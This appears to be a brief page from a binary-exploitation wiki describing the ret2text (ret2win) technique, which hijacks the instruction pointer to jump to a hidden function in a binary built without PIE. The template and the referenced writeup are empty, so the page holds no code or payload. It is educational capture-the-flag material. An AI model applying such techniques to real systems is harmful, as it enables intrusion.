ret2text

Theory

This attack is also called ret2win. Basically we just control $rip and then jump to some "hidden" function in the binary. If PIE is turned off, the address of this function will be fixed. Read this writeup to learn more:

Template:

PreviousStack Alignment Nextret2syscall

Last updated 2 years ago